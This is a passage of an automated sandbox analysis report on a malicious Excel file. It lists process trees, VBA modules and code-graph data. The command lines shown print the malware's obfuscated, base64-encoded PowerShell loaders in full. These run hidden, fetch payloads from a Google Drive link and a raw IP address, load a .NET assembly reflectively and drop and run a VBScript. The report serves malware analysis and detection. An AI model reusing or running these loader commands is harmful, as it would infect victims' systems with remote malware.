'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZG
VzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:14
                                                                                              Start time:02:39:49
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:02:39:50
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                              Imagebase:0x13f170000
                                                                                              File size:13'824 bytes
                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:17
                                                                                              Start time:02:39:54
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:19
                                                                                              Start time:02:39:55
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:21
                                                                                              Start time:02:39:57
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
                                                                                              Imagebase:0x13f240000
                                                                                              File size:2'758'280 bytes
                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:22
                                                                                              Start time:02:39:58
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
                                                                                              Imagebase:0x13f6c0000
                                                                                              File size:52'744 bytes
                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:24
                                                                                              Start time:02:40:03
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
                                                                                              Imagebase:0xff600000
                                                                                              File size:168'960 bytes
                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:25
                                                                                              Start time:02:40:03
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZG
VzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              Target ID:27
                                                                                              Start time:02:40:04
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true


                                                                                              Module: Sheet1

                                                                                              Declaration
                                                                                              Attribute VB_Name = "Sheet1"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True

                                                                                              Module: Sheet2

                                                                                              Declaration
                                                                                              Attribute VB_Name = "Sheet2"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True

                                                                                              Module: Sheet3

                                                                                              Declaration
                                                                                              Attribute VB_Name = "Sheet3"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True

                                                                                              Module: ThisWorkbook

                                                                                              Declaration
                                                                                              Attribute VB_Name = "ThisWorkbook"
                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.426133415.0000000002DC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_2dc0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                • Instruction ID: 44b456da7c15ac8eeb664d97a1433c767d2b86eca9e0dba855d3f302031d4c2a
                                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                • Instruction Fuzzy Hash:

                                                                                                Execution Graph

                                                                                                Execution Coverage:5%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:50%
                                                                                                Total number of Nodes:6
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 2497 7fe88e559e1 2498 7fe88e559f1 URLDownloadToFileW 2497->2498 2500 7fe88e55b00 2498->2500 2501 7fe88e54b18 2502 7fe88e55a30 URLDownloadToFileW 2501->2502 2504 7fe88e55b00 2502->2504

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 101 7fe88e54b18-7fe88e55aa1 105 7fe88e55aa3-7fe88e55aa8 101->105 106 7fe88e55aab-7fe88e55ab1 101->106 105->106 107 7fe88e55ab3-7fe88e55ab8 106->107 108 7fe88e55abb-7fe88e55afe URLDownloadToFileW 106->108 107->108 109 7fe88e55b00 108->109 110 7fe88e55b06-7fe88e55b23 108->110 109->110
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.475966843.000007FE88E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88E50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88e50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: DownloadFile
                                                                                                • String ID:
                                                                                                • API String ID: 1407266417-0
                                                                                                • Opcode ID: fd4c8ce43aa837d011d7644b9ef6885a26e0f585a8451fc791eab1d2ecc86802
                                                                                                • Instruction ID: 6625624392cc402f20af31f75445c57b70ad52a67572983d578ccf4a7280b7f3
                                                                                                • Opcode Fuzzy Hash: fd4c8ce43aa837d011d7644b9ef6885a26e0f585a8451fc791eab1d2ecc86802
                                                                                                • Instruction Fuzzy Hash: DB319F31918E1C8FDB58DF9CD8857A9B7E0FB69321F00822ED04ED3652CB70A9068B81

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.476196271.000007FE88F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88F20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0cY$8=Y
                                                                                                • API String ID: 0-11084473
                                                                                                • Opcode ID: f8d4f22a27988e2817cafd1ebe2f4df5963d45cede0c0fa58ea37a8d03c8d5eb
                                                                                                • Instruction ID: 92c41eec0a941053b937fceef900ed8acfcfc336592117556f47c0c14083218c
                                                                                                • Opcode Fuzzy Hash: f8d4f22a27988e2817cafd1ebe2f4df5963d45cede0c0fa58ea37a8d03c8d5eb
                                                                                                • Instruction Fuzzy Hash: 9C221230A0CB894FD75AEB2C9450675BBE2FF9A344F2801AAD49EC72A3DB349D15C741

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.475966843.000007FE88E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88E50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88e50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: DownloadFile
                                                                                                • String ID:
                                                                                                • API String ID: 1407266417-0
                                                                                                • Opcode ID: f73932adf486f1b77e6734a471af790095287316b0bf7f673ddd52bb06a1885e
                                                                                                • Instruction ID: 4f410cb2eee1d22c562956ef4011a090ac6b71edf71bb21886caed707a910b55
                                                                                                • Opcode Fuzzy Hash: f73932adf486f1b77e6734a471af790095287316b0bf7f673ddd52bb06a1885e
                                                                                                • Instruction Fuzzy Hash: 2E41E47080CB8C9FDB1ADB989C447A9BBF0FB56321F04826FD089D3162CB74A806C781

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.476196271.000007FE88F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88F20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: xFQ
                                                                                                • API String ID: 0-2256667130
                                                                                                • Opcode ID: 498e0be57f5a4cd77d0ca0b1f9a6c7e4c74ad01299f9a48da6200241a29b3159
                                                                                                • Instruction ID: 8cca62251fc85be6f78f612a95b79bde9c97c7350cce5b89a7cd9107e9340da6
                                                                                                • Opcode Fuzzy Hash: 498e0be57f5a4cd77d0ca0b1f9a6c7e4c74ad01299f9a48da6200241a29b3159
                                                                                                • Instruction Fuzzy Hash: CCB1422060D7C90FE34B973858646617FE1EF57210B2901EBD88DCB2B3D6189D9AC321

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.476196271.000007FE88F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88F20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (U$(U$(U$(U$(U$(U$0TY$0TY$0cY$0cY$8=Y$8=Y
                                                                                                • API String ID: 0-3995256861
                                                                                                • Opcode ID: 542daffa8f3984135b0854eba5e192b92f7e5c7b95754ac366b26d6b58e9d091
                                                                                                • Instruction ID: 210926f90acc3d2512240c6b41dd6aa8b481d5c1a047249e3550fa33360d56ea
                                                                                                • Opcode Fuzzy Hash: 542daffa8f3984135b0854eba5e192b92f7e5c7b95754ac366b26d6b58e9d091
                                                                                                • Instruction Fuzzy Hash: 3652033150D7CA0FE35AA72898212B57FE1EF97254F1900EBD49ECB1A3E7186916C352

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 447 7fe88f2314b-7fe88f23169 448 7fe88f231b2-7fe88f231fb 447->448 449 7fe88f2316b-7fe88f231b1 447->449 449->448
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.476196271.000007FE88F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88F20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 87i
